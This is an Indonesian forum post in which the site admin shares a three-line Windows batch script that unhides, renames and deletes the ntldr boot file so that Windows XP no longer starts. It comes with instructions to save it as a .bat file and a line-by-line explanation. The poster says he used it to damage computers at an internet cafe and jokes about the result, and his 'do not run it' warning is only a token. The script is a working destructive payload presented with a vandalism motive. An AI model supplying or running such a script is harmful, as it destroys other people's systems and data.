CLABERS BAND GARUT
 
IndeksIndeks  CalendarCalendar  FAQFAQ  PencarianPencarian  AnggotaAnggota  GroupGroup  PendaftaranPendaftaran  LoginLogin  
Pencarian
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» Avacs Live Chat
Mon Jun 11, 2012 7:39 am by not

» Membuat Dll Point Blank With Devc++
Fri Jan 20, 2012 11:17 am by Cincalaura

» Download Harvest Moon For PC
Wed Dec 21, 2011 1:43 am by Muhammad Rofi'i

» indoblling full
Wed Aug 17, 2011 8:34 am by jaeky

» script radio.. snutz.us
Tue Aug 16, 2011 10:53 pm by Redmiss

» fish oil sardines
Wed Aug 03, 2011 8:07 pm by Tamu

» l tell you.Thanks!
Wed Aug 03, 2011 8:53 am by Tamu

» info on tramadol cat
Tue Aug 02, 2011 7:01 am by Tamu

» fish oil barleans
Tue Aug 02, 2011 3:44 am by Tamu

Navigation
 Portal
 Indeks
 Anggota
 Profil
 FAQ
 Pencarian
Forum
Affiliates
free forum


Share | 
 

 Script Simple Tapi Berbahaya

Go down 
PengirimMessage
Admin
Penanggung jawab
Penanggung jawab
avatar

Jumlah posting : 356
Points : 186802
Cendol : 8
Join date : 26.11.10
Age : 28

PostSubyek: Script Simple Tapi Berbahaya    Thu Dec 02, 2010 9:07 pm

mohon maaf sebelumnya gw nemu di flashdisk ku ..
dulu dapet dari google ..
waktu itu lg d warnet gemes banget ama nih warnet akhirnya aq coba2 deh rusakin comp >.<

eiits tp gk boleh gitu ya ngrusak2 kkwkwk

Part 1 .bat yg jahat

Buka notepad, lalu tulis script di bawah ini, yang warna biru aja, yang item jangan :

attrib –s –h –r c:\ntldr <~ mengubah atribut si ‘ntldr’ menjadi, system=false(-), hidden=false(-), readonly=false(-)
ren c:\ntldr mledukkomplu <~ mengubah nama si ‘ntldr’ menjadi ‘mledukkomplu’
del c:\mledukkomplu <~ karena saya suka ragu, saya hapus pula si mledukkomplu itu (ntldr)



Save dengan ekstensi .bat, Tapi JANGAN DIJALANKAN! BAHAYA!


Kesimpulan :
Script diatas akan mengeset atribut file ‘ntldr’ yang merupakan ‘Jantung’ si windows XP, menjadi –s –h –r [not system, not hidden, not read-only], jadi file akan muncul dan bisa di edit karena ‘read-only’ nya sudah dicopot.

Lalu script ini akan merubah nama si ‘ntldr’ menjadi, ‘udahrusakgan’, nah, di baris ini, ntldr, sudah berubah jadi udahrusakgan, artinya, Jika anda shutdown computer anda, dan menyalakannya lagi, pada saat booting, file NTLDR tidak akan ditemukan karena namanya sudah berubah. Dan si XP akan minta di Reinstall!! Hahahahaha!!

Baris ketiga akan menghapus file ‘ntldr’ dari harddisk anda… wekekekekek…

Hebat kan? Cuma dengan 3 baris script, kita bisa menghabisi computer dengan bahasa yang terdekat, gratis dan mudah dipahami, Batch…

credit maaf saya lupa copy di google ..
barang x berguna hehehe .. part 2 nyusul ye
Kembali Ke Atas Go down
Lihat profil user http://clabers.indonesianforum.net
 
Script Simple Tapi Berbahaya
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» serupa tapi tak sama
» Red Ninja Surabaya Simple aja deh
» lampu tembak rem belakang berbahaya bagi pengendara yg lain
» ninja hijau SE 2011 sederhana tapi punya gaya walau biasa
» Red ninja cutting sticker (simple modified)

Permissions in this forum:Anda tidak dapat menjawab topik
CHEAT POINT BLANK :: WEB :: SOURCE CODE-
Navigasi: